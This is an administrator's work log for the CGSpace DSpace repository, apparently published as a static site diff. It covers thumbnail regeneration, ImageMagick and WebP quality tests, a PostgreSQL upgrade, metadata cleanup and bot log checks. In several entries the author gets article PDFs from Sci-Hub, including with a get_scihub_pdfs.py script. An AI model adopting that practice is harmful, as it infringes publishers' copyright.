  • Export all our ORCIDs and resolve their names to see if any have changed:
  • +
+
$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2023-03-14-orcids.txt
+$ ./ilri/resolve_orcids.py -i /tmp/2023-03-14-orcids.txt -o /tmp/2023-03-14-orcids-names.txt -d
+
    +
  • Then update them in the database:
  • +
+
$ ./ilri/update_orcids.py -i /tmp/2023-03-14-orcids-names.txt -db dspace -u dspace -p 'fuuu' -m 247
+

2023-03-15

+
    +
  • Jawoo was asking about possibilities to harvest PDFs from CGSpace for some kind of AI chatbot integration +
      +
    • I see we have 45,000 PDFs (format ID 2)
    • +
    +
  • +
+
localhost/dspacetest= ☘ SELECT COUNT(*) FROM bitstream WHERE NOT deleted AND bitstream_format_id=2;
+ count 
+───────
+ 45281
+(1 row)
+
    +
  • Rework some of my Python scripts to use a common db_connect function from util (a minimal sketch of such a helper is below, after this list)
  • +
  • I reworked my post_bitstreams.py script to be able to overwrite bitstreams if requested +
      +
    • The use case is to upload thumbnails for all the journal articles where we have these horrible pixelated journal covers
    • +
    • I replaced JPEG thumbnails for ~896 ILRI publications by exporting a list of DOIs from the 10568/3 collection that were CC-BY, getting their PDFs from Sci-Hub, and then posting them with my new script
    • +
    +
  • +
+
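The helper is roughly along these lines (a sketch only, assuming psycopg2; the parameters and example credentials are placeholders):

import psycopg2

def db_connect(dbname: str, user: str, password: str, host: str = "localhost", port: int = 5432):
    # Return a PostgreSQL connection so each script doesn't repeat its own
    # connection boilerplate
    return psycopg2.connect(dbname=dbname, user=user, password=password, host=host, port=port)

# Example usage in a script:
# conn = db_connect("dspace", "dspace", "fuuu")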

2023-03-16

+
    +
  • Continue working on the ILRI publication thumbnails +
      +
    • There were about sixty-four that had existing PNG “journal cover” thumbnails that didn’t get replaced because I only overwrote the JPEG ones yesterday
    • +
    • Now I generated a list of those bitstream UUIDs and deleted them with a shell script via the REST API
    • +
    +
  • +
  • I made a pull request on DSpace 7 to update the bitstream format registry for PNG, WebP, and AVIF
  • +
  • Export CGSpace to perform mappings to Initiatives collections
  • +
  • I also used this export to find CC-BY items with DOIs that had JPEGs or PNGs in their provenance, meaning that the submitter likely submitted a low-quality “journal cover” for the item +
      +
    • I found about 330 of them and got most of their PDFs from Sci-Hub and replaced the crappy thumbnails with real ones where Sci-Hub had them (~245)
    • +
    +
  • +
  • In related news, I realized you can get an API key from Elsevier and download the PDFs from their API:
  • +
+
import requests
+
+api_key = 'fuuuuuuuuu'
+doi = "10.1016/j.foodqual.2021.104362"
+request_url = f'https://api.elsevier.com/content/article/doi:{doi}'
+
+headers = {
+    'X-ELS-APIKEY': api_key,
+    'Accept': 'application/pdf'
+}
+
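+# Stream the response and write the PDF to disk in 1 MiB chunks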
+with requests.get(request_url, stream=True, headers=headers) as r:
+    if r.status_code == 200:
+        with open("article.pdf", "wb") as f:
+            for chunk in r.iter_content(chunk_size=1024*1024):
+                f.write(chunk)
+
    +
  • The question is, how do we know if a DOI is Elsevier or not…
  • +
  • CGIAR Repositories Working Group meeting +
      +
    • We discussed controlled vocabularies for funders
    • +
    • I suggested checking our combined lists against Crossref and ROR
    • +
    +
  • +
  • Export a list of donors from cg.contributor.donor on CGSpace:
  • +
+
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=248) to /tmp/2023-03-16-donors.txt;
+COPY 1521
+
    +
  • Then resolve them against Crossref’s funders API:
  • +
+
$ ./ilri/crossref_funders_lookup.py -e fuuuu@cgiar.org -i /tmp/2023-03-16-donors.txt -o ~/Downloads/2023-03-16-cgspace-crossref-funders-results.csv -d
+$ csvgrep -c matched -m true ~/Downloads/2023-03-16-cgspace-crossref-funders-results.csv | wc -l
+472
+$ sed 1d ~/Downloads/2023-03-16-cgspace-crossref-funders-results.csv | wc -l 
+1521
+
    +
  • That’s a 31% hit rate, but I see some simple things like “Bill and Melinda Gates Foundation” instead of “Bill & Melinda Gates Foundation”
  • +
+

2023-03-17

+
    +
  • I did the same lookup of CGSpace donors on ROR’s 2022-12-01 data dump:
  • +
+
$ ./ilri/ror_lookup.py -i /tmp/2023-03-16-donors.txt -o ~/Downloads/2023-03-16-cgspace-ror-funders-results.csv -r v1.15-2022-12-01-ror-data.json
+$ csvgrep -c matched -m true ~/Downloads/2023-03-16-cgspace-ror-funders-results.csv | wc -l                                            
+407
+$ sed 1d ~/Downloads/2023-03-16-cgspace-ror-funders-results.csv | wc -l
+1521
+
    +
  • That’s a 26.7% hit rate
  • +
  • As for the number of funders in each dataset +
      +
    • Crossref has about 34,000
    • +
    • ROR has 15,000 if “FundRef” data is a proxy for that:
    • +
    +
  • +
+
$ grep -c -rsI FundRef v1.15-2022-12-01-ror-data.json    
+15162
+
    +
  • On a related note, I remembered that DOI.org has a list of DOI prefixes and publishers: https://doi.crossref.org/getPrefixPublisher +
      +
    • In Python I can look up publishers by prefix easily, here with a nested list comprehension:
    • +
    +
  • +
+
In [10]: [publisher for publisher in publishers if '10.3390' in publisher['prefixes']]
+Out[10]: 
+[{'prefixes': ['10.1989', '10.32545', '10.20944', '10.3390', '10.35995'],
+  'name': 'MDPI AG',
+  'memberId': 1968}]
+
    +
  • And in OpenRefine, if I create a new column based on the DOI using Jython:
  • +
+
import json
+
+with open("/home/aorth/src/git/DSpace/publisher-doi-prefixes.json", "rb") as f:
+    publishers = json.load(f)
+
+doi_prefix = value.split("/")[3]
+
+publisher = [publisher for publisher in publishers if doi_prefix in publisher['prefixes']]
+
+return publisher[0]['name']
+
    +
  • … though this is very slow and hung OpenRefine when I tried it (a faster dict-based variant is sketched below)
  • +
  • I added the ability to overwrite multiple bitstream formats at once in post_bitstreams.py
  • +
+
$ ./ilri/post_bitstreams.py -i test.csv -u https://dspacetest.cgiar.org/rest -e fuuu@example.com -p 'fffnjnjn' -d -s 2B40C7C4E34CEFCF5AFAE4B75A8C52E2 --overwrite JPEG --overwrite PNG -n
+Session valid: 2B40C7C4E34CEFCF5AFAE4B75A8C52E2
+Opened test.csv
+384142cb-58b9-4e64-bcdc-0a8cc34888b3: checking for existing bitstreams in THUMBNAIL bundle
+> (DRY RUN) Deleting bitstream: IFPRI Malawi_Maize Market Report_February_202_anonymous.pdf.jpg (16883cb0-1fc8-4786-a04f-32132e0617d4)
+> (DRY RUN) Deleting bitstream: AgroEcol_Newsletter_2.png (7e9cd434-45a6-4d55-8d56-4efa89d73813)
+> (DRY RUN) Uploading file: 10568-129666.pdf.jpg
+
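The dict-based variant I mean is roughly this: load the publisher list once and index it by prefix, so each DOI lookup is a dictionary access instead of a scan of the whole list (the file path is the one from above; the rest is just a sketch):

import json

with open("/home/aorth/src/git/DSpace/publisher-doi-prefixes.json", "rb") as f:
    publishers = json.load(f)

# Build the lookup once: each DOI prefix maps directly to the publisher name
prefix_to_name = {
    prefix: publisher["name"]
    for publisher in publishers
    for prefix in publisher["prefixes"]
}

print(prefix_to_name.get("10.3390"))  # MDPI AG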
    +
  • I learned how to use Python’s built-in logging module and it simplifies all my debug and info printing (a small example is below, after this list) +
      +
    • I re-factored a few scripts to use the new logging
    • +
    +
  • +
+
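Roughly the kind of pattern I mean (the format string and level here are just examples):

import logging

logger = logging.getLogger(__name__)
logging.basicConfig(format="[%(levelname)s] %(message)s", level=logging.INFO)

logger.debug("Connecting to the REST API")  # hidden unless the level is DEBUG
logger.info("Uploaded 85 thumbnails")       # replaces ad-hoc print() calls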

2023-03-18

+
    +
  • I applied changes for publishers on 16,000 items in batches of 5,000
  • +
  • While working on my post_bitstreams.py script I realized the Tomcat Crawler Session Manager valve that groups bot user agents into sessions is causing my login to fail the first time, every time +
      +
    • I’ve disabled it for now and will check the Munin session graphs after some time to see if it makes a difference
    • +
    • In any case I have much better spider user agent lists in DSpace now than I did years ago when I started using the Crawler Session Manager valve
    • +
    +
  • +
+

2023-03-19

+
    +
  • Start a harvest on AReS
  • +
+

2023-03-20

+
    +
  • Minor updates to a few of my DSpace Python scripts to fix the logging
  • +
  • Minor updates to some records for Mazingira reported by Sonja
  • +
  • Upgrade PostgreSQL on DSpace Test from version 12 to 14, the same way I did from 10 to 12 last year: +
      +
    • First, I installed the new version of PostgreSQL via the Ansible playbook scripts
    • +
    • Then I stopped Tomcat and all PostgreSQL clusters and used pg_upgrade to upgrade the old version:
    • +
    +
  • +
+
# systemctl stop tomcat7
+# pg_ctlcluster 12 main stop
+# tar -cvzpf var-lib-postgresql-12.tar.gz /var/lib/postgresql/12
+# tar -cvzpf etc-postgresql-12.tar.gz /etc/postgresql/12
+# pg_ctlcluster 14 main stop
+# pg_dropcluster 14 main
+# pg_upgradecluster 12 main
+# pg_ctlcluster 14 main start
+
+
$ su - postgres
+$ cat /tmp/generate-reindex.sql
+SELECT 'REINDEX TABLE CONCURRENTLY ' || quote_ident(relname) || ' /*' || pg_size_pretty(pg_total_relation_size(C.oid)) || '*/;'
+FROM pg_class C
+LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
+WHERE nspname = 'public'
+  AND C.relkind = 'r'
+  AND nspname !~ '^pg_toast'
+ORDER BY pg_total_relation_size(C.oid) ASC;
+$ psql dspace < /tmp/generate-reindex.sql > /tmp/reindex.sql
+$ <trim the extra stuff from /tmp/reindex.sql>
+$ psql dspace < /tmp/reindex.sql
+
    +
  • The index on metadatavalue shrank by 90MB, and others a bit less +
      +
    • This is nice, but not as drastic as I noticed last year when upgrading to PostgreSQL 12
    • +
    +
  • +
+

2023-03-21

+
    +
  • Leigh sent me a list of IFPRI authors with ORCID identifiers so I combined them with our list and resolved all their names with resolve_orcids.py +
      +
    • It adds 154 new ORCID identifiers
    • +
    +
  • +
  • I did a follow up to the publisher names from last week using the list from doi.org +
      +
    • Last week I only updated items with a DOI that had no publisher, but now I was curious to see how our existing publisher information compared
    • +
    • I checked a dozen or so manually and, other than CIFOR/ICRAF and CIAT/Alliance, the metadata was better than our existing data, so I overwrote them
    • +
    +
  • +
  • I spent some time trying to figure out how to get ssimulacra2 running so I could compare thumbnails in JPEG and WebP +
      +
    • I realized that we can’t directly compare JPEG to WebP; we need to convert to JPEG/WebP, then convert each to lossless PNG
    • +
    • Also, we shouldn’t be comparing the resulting images against each other, but rather against the original, so I also need a straight PDF to lossless PNG conversion
    • +
    • After playing with WebP at Q82 and Q92, I see it has lower ssimulacra2 scores than JPEG Q92 for the dozen test files
    • +
    • Could it just be something with ImageMagick?
    • +
    +
  • +
+

2023-03-22

+
    +
  • I updated csv-metadata-quality to use pandas 2.0.0rc1 and everything seems to work…? +
      +
    • So the issues with nulls (isna) when I tried the first release candidate a few weeks ago were resolved?
    • +
    +
  • +
  • Meeting with Jawoo and others about a “ChatGPT-like” thing for CGIAR data using CGSpace documents and metadata
  • +
+

2023-03-23

+
    +
  • Add a missing IFPRI ORCID identifier to CGSpace and tag his items on CGSpace
  • +
  • A super unscientific comparison between csv-metadata-quality’s pytest regimen using Pandas 1.5.3 and Pandas 2.0.0rc1 +
      +
    • The data was gathered using rusage, and these are the results of the last of three consecutive runs:
    • +
    +
  • +
+
# Pandas 1.5.3
+RL: took 1,585,999µs wall time
+RL: ballooned to 272,380kb in size
+RL: needed 2,093,947µs cpu (25% kernel)
+RL: caused 55,856 page faults (100% memcpy)
+RL: 699 context switches (1% consensual)
+RL: performed 0 reads and 16 write i/o operations
+
+# Pandas 2.0.0rc1
+RL: took 1,625,718µs wall time
+RL: ballooned to 262,116kb in size
+RL: needed 2,148,425µs cpu (24% kernel)
+RL: caused 63,934 page faults (100% memcpy)
+RL: 461 context switches (2% consensual)
+RL: performed 0 reads and 16 write i/o operations
+
    +
  • So it seems that Pandas 2.0.0rc1 took ten megabytes less RAM… interesting to see that the PyArrow-backed dtypes make a measurable difference even on my small test set +
      +
    • I should try to compare runs of larger input files
    • +
    +
  • +
+

2023-03-24

+
    +
  • I added a Flyway SQL migration for the PNG bitstream format registry changes on DSpace 7.6
  • +
+

2023-03-26

+
    +
  • There seems to be a slightly high load on CGSpace +
      +
    • I don’t see any locks in PostgreSQL, but there’s some new bot I have never heard of:
    • +
    +
  • +
+
92.119.18.13 - - [26/Mar/2023:18:41:47 +0200] "GET /handle/10568/16500/discover?filtertype_0=impactarea&filter_relational_operator_0=equals&filter_0=Climate+adaptation+and+mitigation&filtertype=sdg&filter_relational_operator=equals&filter=SDG+11+-+Sustainable+cities+and+communities HTTP/2.0" 200 7856 "-" "colly - https://github.com/gocolly/colly"
+
    +
  • In the last week I see a handful of IPs making requests with this agent:
  • +
+
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.{2,3,4,5,6,7}.gz | grep gocolly | awk '{print $1}' | sort | uniq -c | sort -h
+      2 194.233.95.37
+   4304 92.119.18.142
+   9496 5.180.208.152
+  27477 92.119.18.13
+
    +
  • Most of these come from Packethub S.A. / ASN 62240 (CLOUVIDER Clouvider - Global ASN, GB)
  • +
  • Oh, I’ve apparently seen this user agent before, as it is in our ILRI spider user agent overrides
  • +
  • I exported CGSpace to check for missing Initiative collection mappings
  • +
  • Start a harvest on AReS
  • +
+

2023-03-27

+
    +
  • The harvest on AReS was incredibly slow and I stopped it about halfway through, twelve hours later +
      +
    • Then I relied on the plugins to get missing items, which caused a high load on the server but actually worked fine
    • +
    +
  • +
  • Continue working on thumbnails on DSpace
  • +
+

2023-03-28

+
    +
  • Regarding ImageMagick there are a few things I’ve learned +
      +
    • The -quality setting does different things for different output formats, see: https://imagemagick.org/script/command-line-options.php#quality
    • +
    • The -compress setting controls the compression algorithm for image data, and is unrelated to lossless/lossy + +
    • +
    • The way DSpace currently does its supersampling by exporting to a JPEG, then making a thumbnail of the JPEG, is a double lossy operation +
        +
      • We should be exporting to something lossless like PNG, PPM, or MIFF, then making a thumbnail from that
      • +
      +
    • +
    • The PNG format is always lossless so the -quality setting controls compression and filtering, but has no effect on the appearance or signature of PNG images
    • +
    • You can use -quality n with WebP’s -define webp:lossless=true, but I’m not sure about the interaction between ImageMagick quality and WebP lossless… +
        +
      • Also, if converting from a lossless format to WebP lossless in the same command, ImageMagick will ignore quality settings
      • +
      +
    • +
    • The MIFF format is useful for piping between ImageMagick commands, but it is also lossless and the quality setting is ignored
    • +
    • You can use a format specifier when piping between ImageMagick commands without writing a file
    • +
    • For example, I want to create a lossless PNG from a distorted JPEG for comparison:
    • +
    +
  • +
+
$ magick convert reference.jpg -quality 85 jpg:- | convert - distorted-lossless.png
+
    +
  • If I convert the JPEG to PNG directly it will ignore the quality setting, so I set the quality and the output format, then pipe it to ImageMagick again to convert to lossless PNG
  • +
  • In an attempt to quantify the generation loss from DSpace’s “JPG → JPG” method of creating thumbnails I wrote a script called generation-loss.sh to test it against a new “PNG → JPG” method (a rough sketch of the comparison is included further below) +
      +
    • With my sample set of seventeen PDFs from CGSpace I found that the “JPG → JPG” method of thumbnailing results in scores an average of 1.6% lower than with the “PNG → JPG” method.
    • +
    • The average file size with the “PNG JPG” method was only 200 bytes larger.
    • +
    +
  • +
  • In my brief testing, the relationship between ImageMagick’s -quality setting and WebP’s -define webp:lossless=true setting is completely unpredictable:
  • +
+
$ magick convert img/10568-103447.pdf.png /tmp/10568-103447.webp
+$ magick convert img/10568-103447.pdf.png -define webp:lossless=true /tmp/10568-103447-lossless.webp
+$ magick convert img/10568-103447.pdf.png -define webp:lossless=true -quality 50 /tmp/10568-103447-lossless-q50.webp
+$ magick convert img/10568-103447.pdf.png -quality 10 -define webp:lossless=true /tmp/10568-103447-lossless-q10.webp
+$ magick convert img/10568-103447.pdf.png -quality 90 -define webp:lossless=true /tmp/10568-103447-lossless-q90.webp
+$ ls -l /tmp/10568-103447*
+-rw-r--r-- 1 aorth aorth 359258 Mar 28 21:16 /tmp/10568-103447-lossless-q10.webp
+-rw-r--r-- 1 aorth aorth 303850 Mar 28 21:15 /tmp/10568-103447-lossless-q50.webp
+-rw-r--r-- 1 aorth aorth 296832 Mar 28 21:16 /tmp/10568-103447-lossless-q90.webp
+-rw-r--r-- 1 aorth aorth 299566 Mar 28 21:13 /tmp/10568-103447-lossless.webp
+-rw-r--r-- 1 aorth aorth 190718 Mar 28 21:13 /tmp/10568-103447.webp
+
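Not the actual generation-loss.sh, but a rough Python sketch of the comparison it does, as described above (the sizes, quality values, and temporary file names are arbitrary, and it assumes the magick and ssimulacra2 binaries are on the PATH):

import subprocess

PDF = "data/10568-103447.pdf[0]"  # first page of a sample PDF

def run(*args):
    subprocess.run(args, check=True)

def score(reference, distorted):
    # ssimulacra2 prints a single score comparing two lossless images
    result = subprocess.run(["ssimulacra2", reference, distorted], capture_output=True, text=True, check=True)
    return float(result.stdout.strip())

# Lossless reference thumbnail made straight from the PDF
run("magick", "convert", "-flatten", PDF, "-resize", "600x600", "/tmp/ref.png")

# "JPG → JPG": lossy supersample, then a lossy thumbnail from it (DSpace's current way)
run("magick", "convert", "-flatten", PDF, "-quality", "92", "/tmp/super.jpg")
run("magick", "convert", "/tmp/super.jpg", "-resize", "600x600", "-quality", "92", "/tmp/thumb-jpg-jpg.jpg")

# "PNG → JPG": lossless supersample, then a lossy thumbnail from it
run("magick", "convert", "-flatten", PDF, "/tmp/super.png")
run("magick", "convert", "/tmp/super.png", "-resize", "600x600", "-quality", "92", "/tmp/thumb-png-jpg.jpg")

# Convert both thumbnails to lossless PNG before scoring them against the reference
run("magick", "convert", "/tmp/thumb-jpg-jpg.jpg", "/tmp/thumb-jpg-jpg.png")
run("magick", "convert", "/tmp/thumb-png-jpg.jpg", "/tmp/thumb-png-jpg.png")

print("JPG → JPG:", score("/tmp/ref.png", "/tmp/thumb-jpg-jpg.png"))
print("PNG → JPG:", score("/tmp/ref.png", "/tmp/thumb-png-jpg.png"))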
    +
  • I’m curious to see a comparison between the ImageMagick -define webp:emulate-jpeg-size=true (aka -jpeg_like in cwebp) option compared to normal lossy WebP quality:
  • +
+
$ for q in 70 80 90; do magick convert img/10568-103447.pdf.png -quality $q -define webp:emulate-jpeg-size=true /tmp/10568-103447-lossy-emulate-jpeg-q${q}.webp; done
+$ for q in 70 80 90; do magick convert /tmp/10568-103447-lossy-emulate-jpeg-q${q}.webp /tmp/10568-103447-lossy-emulate-jpeg-q${q}.webp.png; done
+$ for q in 70 80 90; do ssimulacra2 img/10568-103447.pdf.png /tmp/10568-103447-lossy-emulate-jpeg-q${q}.webp.png 2>/dev/null; done
+81.29082887
+84.42134524
+85.84458964
+$ for q in 70 80 90; do magick convert img/10568-103447.pdf.png -quality $q /tmp/10568-103447-lossy-q${q}.webp; done
+$ for q in 70 80 90; do magick convert /tmp/10568-103447-lossy-q${q}.webp /tmp/10568-103447-lossy-q${q}.webp.png; done
+$ for q in 70 80 90; do ssimulacra2 img/10568-103447.pdf.png /tmp/10568-103447-lossy-q${q}.webp.png 2>/dev/null; done
+77.25789006
+80.79140936
+84.79108246
+
    +
  • Using -define webp:method=6 (versus default 4) gets a ~0.5% increase on ssimulacra2 score
  • +
+

2023-03-29

+
    +
  • Looking at the -define webp:near-lossless=$q option in ImageMagick and I don’t think it’s working:
  • +
+
$ for q in 20 40 60 80 90; do magick convert -flatten data/10568-103447.pdf\[0\] -define webp:near-lossless=$q -verbose /tmp/10568-103447-near-lossless-q${q}.webp; done 
+data/10568-103447.pdf[0]=>/tmp/10568-103447-near-lossless-q20.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.080u 0:00.043
+data/10568-103447.pdf[0]=>/tmp/10568-103447-near-lossless-q40.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.080u 0:00.043
+data/10568-103447.pdf[0]=>/tmp/10568-103447-near-lossless-q60.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.090u 0:00.043
+data/10568-103447.pdf[0]=>/tmp/10568-103447-near-lossless-q80.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.090u 0:00.043
+data/10568-103447.pdf[0]=>/tmp/10568-103447-near-lossless-q90.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.080u 0:00.043
+
    +
  • The file sizes are all the same…
  • +
  • If I try with -quality $q it works:
  • +
+
$ for q in 20 40 60 80 90; do magick convert -flatten data/10568-103447.pdf\[0\] -quality $q -verbose /tmp/10568-103447-q${q}.webp; done     
+data/10568-103447.pdf[0]=>/tmp/10568-103447-q20.webp PDF 595x842 595x842+0+0 16-bit sRGB 52602B 0.080u 0:00.045
+data/10568-103447.pdf[0]=>/tmp/10568-103447-q40.webp PDF 595x842 595x842+0+0 16-bit sRGB 64604B 0.090u 0:00.045
+data/10568-103447.pdf[0]=>/tmp/10568-103447-q60.webp PDF 595x842 595x842+0+0 16-bit sRGB 73584B 0.080u 0:00.045
+data/10568-103447.pdf[0]=>/tmp/10568-103447-q80.webp PDF 595x842 595x842+0+0 16-bit sRGB 88652B 0.090u 0:00.045
+data/10568-103447.pdf[0]=>/tmp/10568-103447-q90.webp PDF 595x842 595x842+0+0 16-bit sRGB 113186B 0.100u 0:00.049
+
    +
  • I don’t see any issues mentioning this in the ImageMagick GitHub issues, so I guess I have to file a bug + +
  • +
  • Meeting with Maria about the Alliance metadata on CGSpace +
      +
    • As the Alliance is not a legal entity they want to reflect that somehow in CGSpace
    • +
    • We discussed updating all the metadata, but because so many documents issued in the last few years have the Alliance indicated inside them and listed as an affiliation in journal article acknowledgements, etc., we decided it is not the best option
    • +
    • Instead, we propose to: +
        +
      • Remove Alliance of Bioversity International and CIAT from the controlled vocabulary for affiliations ASAP
      • +
      • Add Bioversity International and the International Center for Tropical Agriculture to the controlled vocabulary for affiliations ASAP
      • +
      • Add a prominent note to the item page for every item in the Alliance community via a custom XMLUI theme (Maria and the Alliance publishing team to send the text)
      • +
      +
    • +
    +
  • +
+

2023-03-30

+
    +
  • The ImageMagick developers confirmed my bug report and created a patch on master +
      +
    • I’m not entirely sure how it works, but the developer seemed to imply we can use lossless mode plus a quality?
    • +
    +
  • +
+
$ magick convert -flatten data/10568-103447.pdf\[0\] -define webp:lossless=true -quality 90 /tmp/10568-103447.pdf.webp
+
    +
  • Now I see a difference between near-lossless and normal quality mode:
  • +
+
$ for q in 20 40 60 80 90; do magick convert -flatten data/10568-103447.pdf\[0\] -define webp:lossless=true -quality $q /tmp/10568-103447-near-lossless-q${q}.webp; done
+$ ls -l /tmp/10568-103447-near-lossless-q*
+-rw-r--r-- 1 aorth aorth 108186 Mar 30 11:36 /tmp/10568-103447-near-lossless-q20.webp
+-rw-r--r-- 1 aorth aorth  97170 Mar 30 11:36 /tmp/10568-103447-near-lossless-q40.webp
+-rw-r--r-- 1 aorth aorth  97382 Mar 30 11:36 /tmp/10568-103447-near-lossless-q60.webp
+-rw-r--r-- 1 aorth aorth 106090 Mar 30 11:36 /tmp/10568-103447-near-lossless-q80.webp
+-rw-r--r-- 1 aorth aorth 105926 Mar 30 11:36 /tmp/10568-103447-near-lossless-q90.webp
+$ for q in 20 40 60 80 90; do magick convert -flatten data/10568-103447.pdf\[0\] -quality $q /tmp/10568-103447-q${q}.webp; done
+$ ls -l /tmp/10568-103447-q*
+-rw-r--r-- 1 aorth aorth  52602 Mar 30 11:37 /tmp/10568-103447-q20.webp
+-rw-r--r-- 1 aorth aorth  64604 Mar 30 11:37 /tmp/10568-103447-q40.webp
+-rw-r--r-- 1 aorth aorth  73584 Mar 30 11:37 /tmp/10568-103447-q60.webp
+-rw-r--r-- 1 aorth aorth  88652 Mar 30 11:37 /tmp/10568-103447-q80.webp
+-rw-r--r-- 1 aorth aorth 113186 Mar 30 11:37 /tmp/10568-103447-q90.webp
+
    +
  • But after reading the source code in coders/webp.c I am not sure I understand, so I asked for clarification in the discussion
  • +
  • Both Bosede and Abenet said mapping on CGSpace is taking a long time; I don’t see any stuck locks, so I decided to quickly restart PostgreSQL
  • +
+

2023-03-31

+
    +
  • Meeting with Daniel and Naim from Alliance in Cali about CGSpace metadata, TIP, etc
  • +
diff --git a/docs/2023-04/index.html b/docs/2023-04/index.html (new file, index 000000000..755ae4e34)

April, 2023

+ +
+

2023-04-02

+
    +
  • Run all system updates on CGSpace and reboot it
  • +
  • I exported CGSpace to CSV to check for any missing Initiative collection mappings +
      +
    • I also did a check for missing country/region mappings with csv-metadata-quality
    • +
    +
  • +
  • Start a harvest on AReS
  • +
+
    +
  • I’m starting to get annoyed at my shell script for doing ImageMagick tests and am looking to re-write it in something object-oriented like Python +
      +
    • There doesn’t seem to be an official ImageMagick Python binding on pypi.org, perhaps I can use Wand?
    • +
    +
  • +
  • Testing Wand in Python:
  • +
+
from wand.image import Image
+
+with Image(filename='data/10568-103447.pdf[0]', resolution=144) as first_page:
+    print(first_page.height)
+
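Continuing that test, resizing and saving an actual thumbnail with Wand could look something like this (the size, quality, and output name are just examples, nothing is settled):

from wand.image import Image

with Image(filename='data/10568-103447.pdf[0]', resolution=144) as first_page:
    first_page.format = 'jpeg'
    first_page.transform(resize='600x600>')  # only shrink, keep the aspect ratio
    first_page.compression_quality = 85
    first_page.save(filename='/tmp/10568-103447.pdf.jpg')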
    +
  • I spent more time re-working my thumbnail scripts to compare the resized images and other minor changes +
      +
    • I am realizing that doing the thumbnails directly from the source improves the ssimulacra2 score by 1-3% points compared to DSpace’s method of creating a lossy supersample followed by a lossy resized thumbnail
    • +
    +
  • +
+

2023-04-03

+
    +
  • The harvest on AReS that I started yesterday never finished, and actually seems to have died… +
      +
    • Also, Fabio and Patrizio from Alliance emailed me to ask if there is something wrong with the REST API because they are having problems
    • +
    • I stopped the harvest and started the plugins to get the remaining items via the sitemap…
    • +
    +
  • +
+

2023-04-04

+
    +
  • Presentation about CGSpace metadata, controlled vocabularies, and curation to Pooja’s communications and development team at UNEP + +
  • +
  • Someone from the system organization contacted me to ask how to download a few thousand PDFs from a spreadsheet with DOIs and Handles
  • +
+
$ csvcut -c Handle ~/Downloads/2023-04-04-Donald.csv \
+    | sed \
+        -e 1d \
+        -e 's_https://hdl.handle.net/__' \
+        -e 's_https://cgspace.cgiar.org/handle/__' \
+        -e 's_http://hdl.handle.net/__' \
+    | sort -u > /tmp/handles.txt
+
    +
  • Then I used the get_dspace_pdfs.py script to download them
  • +
+

2023-04-05

+
    +
  • After some cleanup on Donald’s DOIs I started the get_scihub_pdfs.py script
  • +
+

2023-04-06

+
    +
  • I did some more work to cleanup and streamline my next generation of DSpace thumbnail testing scripts +
      +
    • I think I found a bug in ImageMagick 7.1.1.5 where CMYK to sRGB conversion fails if we use image operations like -density or -define before reading the input file
    • +
    • I started a discussion on the ImageMagick GitHub to ask
    • +
    +
  • +
  • Yesterday I started downloading the rest of the PDFs from Donald, those that had DOIs +
      +
    • As a measure of caution, I extracted the list of DOIs and used my crossref_doi_lookup.py script to get their licenses from Crossref:
    • +
    +
  • +
+
$ ./ilri/crossref_doi_lookup.py -e xxxx@i.org -i /tmp/dois.txt -o /tmp/donald-crossref-dois.csv -d
+
    +
  • Then I did some CSV manipulation to extract the DOIs that were Creative Commons licensed, excluding any that were “No Derivatives”, and re-formatting the DOIs:
  • +
+
$ csvcut -c doi,license /tmp/donald-crossref-dois.csv \
+  | csvgrep -c license -m 'creativecommons' \
+  | csvgrep -c license -i -r 'by-(nd|nc-nd)' \
+  | sed -e 's_^10_https://doi.org/10_' \
+    -e 's/\(am\|tdm\|unspecified\|vor\): //' \
+  | tee /tmp/donald-open-dois.csv \
+  | wc -l
+4268
+
    +
  • From those I filtered for the DOIs for which I had downloaded PDFs (using the filename column from the Sci-Hub script’s output) and copied them to a separate directory:
  • +
+
$ for file in $(csvjoin -c doi /tmp/donald-doi-pdfs.csv /tmp/donald-open-dois.csv | csvgrep -c filename -i -r '^$' | csvcut -c filename | sed 1d); do cp --reflink=always "$file" "creative-commons-licensed/$file"; done
+
    +
  • I used BTRFS copy-on-write via reflinks to make sure I didn’t duplicate the files :-D
  • +
  • I ran out of time and had to stop the process after around 3,127 PDFs +
      +
    • I zipped them up and sent them to the others, along with a CSV of the DOIs, PDF filenames, and licenses
    • +
    +
  • +
+

2023-04-17

+
    +
  • Abenet noticed a weird issue with this item +
      +
    • The item has metadata, but the page is blank
    • +
    • When I try to edit the item’s authorization policies in XMLUI I get a nullPointerException:
    • +
    +
  • +
+
Java stacktrace: java.lang.NullPointerException
+	at org.dspace.app.xmlui.aspect.administrative.authorization.EditItemPolicies.addBody(EditItemPolicies.java:166)
+	at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:234)
+	at sun.reflect.GeneratedMethodAccessor347.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy201.startElement(Unknown Source)
+	at org.apache.cocoon.components.sax.XMLTeePipe.startElement(XMLTeePipe.java:87)
+	at org.apache.cocoon.xml.AbstractXMLPipe.startElement(AbstractXMLPipe.java:94)
+	at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:251)
+	at sun.reflect.GeneratedMethodAccessor347.invoke(Unknown Source)
+	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+	at java.lang.reflect.Method.invoke(Method.java:498)
+	at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
+	at com.sun.proxy.$Proxy203.startElement(Unknown Source)
+	at org.apache.cocoon.xml.AbstractXMLPipe.startElement(AbstractXMLPipe.java:94)
